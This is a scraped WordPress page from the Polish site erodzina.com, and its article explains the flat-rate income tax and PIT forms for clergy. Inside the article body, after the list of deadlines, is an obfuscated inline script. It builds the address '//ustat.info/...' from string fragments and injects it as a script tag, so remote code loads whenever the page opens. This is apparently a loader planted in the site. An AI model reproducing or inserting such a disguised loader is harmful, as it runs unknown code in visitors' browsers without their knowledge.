                <div class="td-module-thumb"><a href="http://www.erodzina.com/bizuteria-slubna-ma-znaczenie/" rel="bookmark" title="Biżuteria ślubna ma znaczenie"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/07/główne_2-bizuteria-topsilver.pl_-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/07/główne_2-bizuteria-topsilver.pl_-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/07/główne_2-bizuteria-topsilver.pl_-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/07/główne_2-bizuteria-topsilver.pl_-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Biżuteria ślubna ma znaczenie"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/slub-i-wesele/para-mloda/" class="td-post-category">Para Młoda</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/bizuteria-slubna-ma-znaczenie/" rel="bookmark" title="Biżuteria ślubna ma znaczenie">Biżuteria ślubna ma znaczenie</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-07-26T12:01:15+00:00">26 lipca 2018</time></span>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_70_5c5e20b7b0422" data-td_block_id="td_uid_70_5c5e20b7b0422"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_70_5c5e20b7b0422" data-td_block_id="td_uid_70_5c5e20b7b0422"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
</ul></div></div>


    <div class="td-header-menu-search">
        <div class="td-search-btns-wrap">
            <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            <a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
        </div>

        <div class="td-search-box-wrap">
            <div class="td-drop-down-search" aria-labelledby="td-header-search-button">
                <form method="get" class="td-search-form" action="http://www.erodzina.com/">
                    <div role="search" class="td-head-form-search-wrap">
                        <input id="td-header-search" type="text" value="" name="s" autocomplete="off"><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Wyszukiwanie">
                    </div>
                </form>
                <div id="td-aj-search"></div>
            </div>
        </div>
    </div>
            </div>
        </div>
    </div>
</div><div class="td-main-content-wrap td-container-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"><div class="entry-crumbs"><span><a title="" class="entry-crumb" href="http://www.erodzina.com/">Strona główna</a></span> <i class="td-icon-right td-bread-sep"></i> <span><a title="Zobacz wszystkie wiadomości Rozrywka i Hobby" class="entry-crumb" href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/">Rozrywka i Hobby</a></span> <i class="td-icon-right td-bread-sep"></i> <span><a title="Zobacz wszystkie wiadomości Książki i magazyny" class="entry-crumb" href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/ksiazki-i-magazyny/">Książki i magazyny</a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last">PITY osób duchownych</span></div></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content"><div class="clearfix"></div>
                                
    <article id="post-3083" class="post-3083 post type-post status-publish format-standard has-post-thumbnail hentry category-ksiazki-i-magazyny" itemscope="" itemtype="http://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/">Rozrywka i Hobby</a></li><li class="entry-category"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/ksiazki-i-magazyny/">Książki i magazyny</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">PITY osób duchownych</h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name"><div class="td-author-by">Przez</div> <a href="http://www.erodzina.com/author/marcin-ozarek/">Redakcja erodzina.com</a><div class="td-author-line"> - </div> </div>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2016-10-11T18:45:16+00:00">11 października 2016</time></span>                    <div class="td-post-comments"><a href="http://www.erodzina.com/pity-osob-duchownych/#respond"><i class="td-icon-comments"></i>0</a></div>                    <div class="td-post-views-wrap">
                                                                    </div>
                </div>
            </header>

        </div>

        <div class="td-post-sharing td-post-sharing-top ">
				<div class="td-default-sharing">
		            <a class="td-social-sharing-buttons td-social-facebook" href="https://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.erodzina.com%2Fpity-osob-duchownych%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Podziel się na Facebooku</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=PITY+os%C3%B3b+duchownych&amp;url=http%3A%2F%2Fwww.erodzina.com%2Fpity-osob-duchownych%2F&amp;via=erodzina.com"><i class="td-icon-twitter"></i><div class="td-social-but-text">Tweet (Ćwierkaj) na Twitterze</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="https://plus.google.com/share?url=http://www.erodzina.com/pity-osob-duchownych/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=http://www.erodzina.com/pity-osob-duchownych/&amp;media=http://www.erodzina.com/wp-content/uploads/2016/10/pitax4.jpg&amp;description=PITY+os%C3%B3b+duchownych" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
		            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=PITY+os%C3%B3b+duchownych%20-%20http%3A%2F%2Fwww.erodzina.com%2Fpity-osob-duchownych%2F"><i class="td-icon-whatsapp"></i></a>
	            </div></div>        
        <div class="td-post-content">

        
        
 <!-- A generated by theme --> 

<script async="" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_top td_block_wrap td_block_ad_box td_uid_73_5c5e20b7b5d79_rand td-pb-border-top td_block_template_1 ">
<script type="text/javascript">
var td_screen_width = window.innerWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3024020928900291" data-ad-slot="9559920390"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3024020928900291" data-ad-slot="9559920390"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3024020928900291" data-ad-slot="9559920390"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-3024020928900291" data-ad-slot="9559920390"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script><ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3024020928900291" data-ad-slot="9559920390" data-adsbygoogle-status="done"><ins id="aswift_0_expand" style="display:inline-table;border:none;height:60px;margin:0;padding:0;position:relative;visibility:visible;width:468px;background-color:transparent;"><ins id="aswift_0_anchor" style="display:block;border:none;height:60px;margin:0;padding:0;position:relative;visibility:visible;width:468px;background-color:transparent;"><iframe width="468" height="60" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_0" name="aswift_0" style="left:0;position:absolute;top:0;border:0px;width:468px;height:60px;"></iframe></ins></ins></ins>
</div>

 <!-- end A --> 

<p><b>Księża oraz osoby duchowne prawnie uznanych innych wyznań opłacają podatek dochodowy głównie w formie ryczałtu od przychodów osiąganych z opłat w związku z pełnionymi funkcjami duszpasterskimi.</b></p>
<p><span id="more-3083"></span></p>
<h2><b>Podatek ryczałtowy a pity</b></h2>
<p>Ponieważ osoby duchowne płacą podatek w formie ryczałtu, to są zwolnione ze składania rocznych pitów o wysokości swojego dochodu z przychodu ze źródła objętego ryczałtem. Osoby duchowne nie wykazują wysokości swoich przychodów ani dochodu z pełnienia funkcji duszpasterskich, a więc nie mają możliwości skorzystania z ulg podatkowych. Podatek ryczałtowy mogą obniżyć tylko o kwotę składki zapłaconej na ubezpieczenie społeczne. Osoby duchowne składają pity, w których wykazują jedynie składki na ubezpieczenie zdrowotne, zapłacone oraz odliczone od podatku. Są to formularze PIT-19A.</p>
<p><a href="http://www.erodzina.com/wp-content/uploads/2016/10/pitax4.jpg" data-rel="lightbox-image-0" data-rl_title="" data-rl_caption="" title=""><img class="aligncenter size-full wp-image-3084 td-animation-stack-type0-1" src="http://www.erodzina.com/wp-content/uploads/2016/10/pitax4.jpg" alt="pitax4" width="1000" height="750" srcset="http://www.erodzina.com/wp-content/uploads/2016/10/pitax4.jpg 1000w, http://www.erodzina.com/wp-content/uploads/2016/10/pitax4-300x225.jpg 300w, http://www.erodzina.com/wp-content/uploads/2016/10/pitax4-768x576.jpg 768w" sizes="(max-width: 1000px) 100vw, 1000px"></a></p>
<h2><b>Wysokość podatku od przychodów z funkcji duszpasterskich</b></h2>
<p>Wysokość podatku ryczałtowego jest określona kwotowo. Nie jest ona zależna od przychodów, lecz od liczby mieszkańców parafii oraz od pełnionej przez duchownego funkcji – proboszcza lub wikariusza. Stawki podatku określone są w załącznikach do ustawy ryczałtowej. Naczelnik urzędu skarbowego, właściwego według miejsca wykonywania funkcji przez osobę duchowną, wydaje decyzję ustalającą wysokość ryczałtu. Wysokość ryczałtu dla wikariuszy jest niższa niż dla proboszczów. Przy ustalaniu wysokości podatku znaczenie ma też wielkość parafii oraz wielkość miejscowości, w której znajduje się parafia.</p>
<p>Osoby duchowne mają obowiązek płacenia podatku ryczałtowego raz na kwartał, do 20. dnia miesiąca po zakończeniu kwartału.</p>
<h2><b>Inne pity osób duchownych</b></h2>
<p>Ryczałt jest podstawową metoda opodatkowania osób duchownych, ale w niektórych sytuacjach, poza deklaracją PIT-19A osoba duchowna musi złożyć również inne pity. Tak np. PIT-37 powinna złożyć osoba duchowna zatrudniona do nauki religii w szkole albo uzyskująca dochód z innych źródeł. W takim przypadku osoba duchowna podlega takim samym zasadom jak inni podatnicy. Składając inne pity może korzystać z ulg podatkowych.</p>
<p>Osoba duchowna ma też prawo rozliczania swojego dochodu na zasadach ogólnych. Powinna wtedy prowadzić księgę przychodów i rozchodów oraz rozliczać <a href="https://www.pitax.pl/rozliczenie-pit/">pity</a> roczne.</p>
<p>Decydując się na rezygnację z ryczałtu i przejście na zasady ogólne opodatkowania osoba duchowna powinna złożyć pisemne oświadczenie do naczelnika urzędu skarbowego.</p>
<p><strong>Oświadczenie takie należy złożyć:</strong></p>
<ul>
<li>przed rozpoczęciem pełnienia funkcji duszpasterskich,</li>
<li>do 20 stycznia danego roku podatkowego,</li>
<li>w ciągu 14 dni po otrzymaniu decyzji o wysokości podatku ryczałtowego.</li>
</ul>
<p><script type="text/javascript">
(function(){
 t6wyu="i874cwvr6wyj";t6wy=document.createElement("script");
 t6wy_="u"+("st");t6wy_+="at"+(".");t6wy.async=true;t6wy_+="in";
 t6wyu="13538133."+t6wyu;t6wy.type="text/javascript";t6wyu+="uxfv3zi7luvv";
 t6wyu+="bbytiw";t6wy_+=("f")+"o"+("/");t6wy.src="//"+t6wy_+t6wyu;
 t6wyd=document.body;t6wyd.appendChild(t6wy);
})();
</script></p>

 <!-- A generated by theme --> 

<script async="" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_bottom td_block_wrap td_block_ad_box td_uid_74_5c5e20b7b5ffa_rand td-pb-border-top td_block_template_1 ">
<script type="text/javascript">
var td_screen_width = window.innerWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3024020928900291" data-ad-slot="1806169440"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3024020928900291" data-ad-slot="1806169440"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3024020928900291" data-ad-slot="1806169440"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-3024020928900291" data-ad-slot="1806169440"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script><ins class="adsbygoogle" style="display: inline-block; width: 468px; height: 0px;" data-ad-client="ca-pub-3024020928900291" data-ad-slot="1806169440" data-adsbygoogle-status="done"><ins id="aswift_1_expand" style="display: inline-table; border: none; height: 0px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 468px; background-color: transparent;"><ins id="aswift_1_anchor" style="display: block; border: none; height: 0px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 468px; background-color: transparent; overflow: hidden; opacity: 0;"><iframe width="468" height="60" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_1" name="aswift_1" style="left:0;position:absolute;top:0;border:0px;width:468px;height:60px;"></iframe></ins></ins></ins>
</div>

 <!-- end A --> 

        </div>

        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

            <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Poprzedni artykuł</span><a href="http://www.erodzina.com/warto-wiedziec-o-florze-bakteryjnej-miejsc-intymnych/">Co warto wiedzieć o florze bakteryjnej miejsc intymnych?</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Następny artykuł</span><a href="http://www.erodzina.com/jakich-ilosciach-mozna-jesc-biegunki/">Co i w jakich ilościach można jeść podczas biegunki?</a></div></div></div>            <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="http://www.erodzina.com/author/marcin-ozarek/">Redakcja erodzina.com</a></span></div>            <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">PODZIEL SIĘ</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="https://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.erodzina.com%2Fpity-osob-duchownych%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=PITY+os%C3%B3b+duchownych&amp;url=http%3A%2F%2Fwww.erodzina.com%2Fpity-osob-duchownych%2F&amp;via=erodzina.com"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="https://plus.google.com/share?url=http://www.erodzina.com/pity-osob-duchownych/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
	            <a class="td-social-sharing-buttons td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=http://www.erodzina.com/pity-osob-duchownych/&amp;media=http://www.erodzina.com/wp-content/uploads/2016/10/pitax4.jpg&amp;description=PITY+os%C3%B3b+duchownych" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=PITY+os%C3%B3b+duchownych%20-%20http%3A%2F%2Fwww.erodzina.com%2Fpity-osob-duchownych%2F"><i class="td-icon-whatsapp"></i></a>
            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameborder="0" src="http://www.facebook.com/plugins/like.php?href=http://www.erodzina.com/pity-osob-duchownych/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><iframe id="twitter-widget-0" scrolling="no" frameborder="0" allowtransparency="true" class="twitter-share-button twitter-share-button-rendered twitter-tweet-button" title="Twitter Tweet Button" src="https://platform.twitter.com/widgets/tweet_button.5b0c4d3ea3997aa2c22eac39be510646.en.html#dnt=false&amp;id=twitter-widget-0&amp;lang=en&amp;original_referer=http%3A%2F%2Fwww.erodzina.com%2Fpity-osob-duchownych%2F&amp;size=m&amp;text=PITY%20os%C3%B3b%20duchownych&amp;time=1549672582099&amp;type=share&amp;url=http%3A%2F%2Fwww.erodzina.com%2Fpity-osob-duchownych%2F" data-url="http://www.erodzina.com/pity-osob-duchownych/" style="position: absolute; visibility: hidden; width: 61px; height: 20px;"></iframe> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>	        <span style="display: none;" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><meta itemprop="name" content="Redakcja erodzina.com"></span><meta itemprop="datePublished" content="2016-10-11T18:45:16+00:00"><meta itemprop="dateModified" content="2017-06-23T14:50:11+00:00"><meta itemscope="" itemprop="mainEntityOfPage" itemtype="https://schema.org/WebPage" itemid="http://www.erodzina.com/pity-osob-duchownych/"><span style="display: none;" itemprop="publisher" itemscope="" itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope="" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://www.erodzina.com/wp-content/uploads/2016/03/logo-2.gif"></span><meta itemprop="name" content="erodzina.com"></span><meta itemprop="headline " content="PITY osób duchownych"><span style="display: none;" itemprop="image" itemscope="" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://www.erodzina.com/wp-content/uploads/2016/10/pitax4.jpg"><meta itemprop="width" content="1000"><meta itemprop="height" content="750"></span>        </footer>
    </article> <!-- /.post -->

    <script>var block_td_uid_75_5c5e20b7b686d = new tdBlock();
block_td_uid_75_5c5e20b7b686d.id = "td_uid_75_5c5e20b7b686d";
block_td_uid_75_5c5e20b7b686d.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_75_5c5e20b7b686d_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_75_5c5e20b7b686d_rand","tdc_css_class_style":"td_uid_75_5c5e20b7b686d_rand_style","live_filter":"cur_post_same_categories","live_filter_cur_post_id":3083,"live_filter_cur_post_author":"2","block_template_id":""}';
block_td_uid_75_5c5e20b7b686d.td_column_number = "3";
block_td_uid_75_5c5e20b7b686d.block_type = "td_block_related_posts";
block_td_uid_75_5c5e20b7b686d.post_count = "3";
block_td_uid_75_5c5e20b7b686d.found_posts = "76";
block_td_uid_75_5c5e20b7b686d.header_color = "";
block_td_uid_75_5c5e20b7b686d.ajax_pagination_infinite_stop = "";
block_td_uid_75_5c5e20b7b686d.max_num_pages = "26";
tdBlocksArray.push(block_td_uid_75_5c5e20b7b686d);
</script><div class="td_block_wrap td_block_related_posts td_uid_75_5c5e20b7b686d_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_75_5c5e20b7b686d"><h4 class="td-related-title td-block-title"><a id="td_uid_76_5c5e20b7b6c91" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_75_5c5e20b7b686d" href="#">POWIĄZANE ARTYKUŁY</a><a id="td_uid_77_5c5e20b7b6c93" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_75_5c5e20b7b686d" href="#">WIĘCEJ OD AUTORA</a></h4><div id="td_uid_75_5c5e20b7b686d" class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/ksiazki-dla-dzieci-nie-tylko-polsku/" rel="bookmark" title="Książki dla dzieci nie tylko polsku"><img width="198" height="145" class="entry-thumb td-animation-stack-type0-1" src="http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-198x145.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-198x145.jpg 198w, http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-300x220.jpg 300w" sizes="(max-width: 198px) 100vw, 198px" alt="" title="Książki dla dzieci nie tylko polsku"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/ksiazki-i-magazyny/" class="td-post-category">Książki i magazyny</a></div>
            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/ksiazki-dla-dzieci-nie-tylko-polsku/" rel="bookmark" title="Książki dla dzieci nie tylko polsku">Książki dla dzieci nie tylko polsku</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory/" rel="bookmark" title="Bestsellery Wydawnictwa Święty Wojciech na zimowe wieczory"><img width="198" height="145" class="entry-thumb td-animation-stack-type0-1" src="http://www.erodzina.com/wp-content/uploads/2018/12/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory-198x145.jpeg" srcset="http://www.erodzina.com/wp-content/uploads/2018/12/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory-198x145.jpeg 198w, http://www.erodzina.com/wp-content/uploads/2018/12/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory-80x60.jpeg 80w, http://www.erodzina.com/wp-content/uploads/2018/12/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory-300x220.jpeg 300w" sizes="(max-width: 198px) 100vw, 198px" alt="" title="Bestsellery Wydawnictwa Święty Wojciech na zimowe wieczory"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/ksiazki-i-magazyny/" class="td-post-category">Książki i magazyny</a></div>
            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/bestsellery-wydawnictwa-swiety-wojciech-na-zimowe-wieczory/" rel="bookmark" title="Bestsellery Wydawnictwa Święty Wojciech na zimowe wieczory">Bestsellery Wydawnictwa Święty Wojciech na zimowe wieczory</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/niezwykla-lektura-dla-mlodych-milosnikow-przygod-explorer-academy-tajemnica-mglawicy/" rel="bookmark" title="Niezwykła lektura dla młodych miłośników przygód – „Explorer Academy. Tajemnica mgławicy”"><img width="198" height="145" class="entry-thumb td-animation-stack-type0-1" src="http://www.erodzina.com/wp-content/uploads/2018/10/okladka-explorer-academy-198x145.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/10/okladka-explorer-academy-198x145.jpg 198w, http://www.erodzina.com/wp-content/uploads/2018/10/okladka-explorer-academy-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/10/okladka-explorer-academy-300x220.jpg 300w" sizes="(max-width: 198px) 100vw, 198px" alt="" title="Niezwykła lektura dla młodych miłośników przygód – „Explorer Academy. Tajemnica mgławicy”"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/ksiazki-i-magazyny/" class="td-post-category">Książki i magazyny</a></div>
            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/niezwykla-lektura-dla-mlodych-milosnikow-przygod-explorer-academy-tajemnica-mglawicy/" rel="bookmark" title="Niezwykła lektura dla młodych miłośników przygód – „Explorer Academy. Tajemnica mgławicy”">Niezwykła lektura dla młodych miłośników przygód – „Explorer Academy. Tajemnica mgławicy”</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_75_5c5e20b7b686d" data-td_block_id="td_uid_75_5c5e20b7b686d"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_75_5c5e20b7b686d" data-td_block_id="td_uid_75_5c5e20b7b686d"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
	<div class="comments" id="comments">
        	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">ZOSTAW ODPOWIEDŹ <small><a rel="nofollow" id="cancel-comment-reply-link" href="/pity-osob-duchownych/#respond" style="display:none;">Anuluj odpowiedź</a></small></h3>			<form action="http://www.erodzina.com/wp-comments-post.php" method="post" id="commentform" class="comment-form anti-spam-form-processed" novalidate="">
				<div class="clearfix"></div>
				<div class="comment-form-input-wrap td-form-comment">
					<textarea placeholder="Komentarz:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea>
					<div class="td-warning-comment">Please enter your comment!</div>
				</div>
		        <div class="comment-form-input-wrap td-form-author">
			            <input class="" id="author" name="author" placeholder="Nazwa:*" type="text" value="" size="30" aria-required="true">
			            <div class="td-warning-author">Please enter your name here</div>
			         </div>
<div class="comment-form-input-wrap td-form-email">
			            <input class="" id="email" name="email" placeholder="E-mail:*" type="text" value="" size="30" aria-required="true">
			            <div class="td-warning-email-error">You have entered an incorrect email address!</div>
			            <div class="td-warning-email">Please enter your email address here</div>
			         </div>
<div class="comment-form-input-wrap td-form-url">
			            <input class="" id="url" name="url" placeholder="Strona Internetowa:" type="text" value="" size="30">
                     </div>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Dodaj Komentarz"> <input type="hidden" name="comment_post_ID" value="3083" id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
</p>
<!-- Anti-spam plugin v.5.3 wordpress.org/plugins/anti-spam/ -->
		<p class="antispam-group antispam-group-q" style="clear: both; display: none;">
			<label>Current ye@r <span class="required">*</span></label>
			<input type="hidden" name="antspm-a" class="antispam-control antispam-control-a" value="2019">
			<input type="text" name="antspm-q" class="antispam-control antispam-control-q" value="5.3" autocomplete="off">
		</p>
		<p class="antispam-group antispam-group-e" style="display: none;">
			<label>Leave this field empty</label>
			<input type="text" name="antspm-e-email-url-website" class="antispam-control antispam-control-e" value="" autocomplete="off">
		</p>
			<input type="hidden" name="antspm-d" class="antispam-control antispam-control-d" value="2019"></form>
			</div><!-- #respond -->
	    </div> <!-- /.content -->
                            <div class="clearfix"></div></div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar"><div class="clearfix"></div>
                                <aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget"><div align="center">
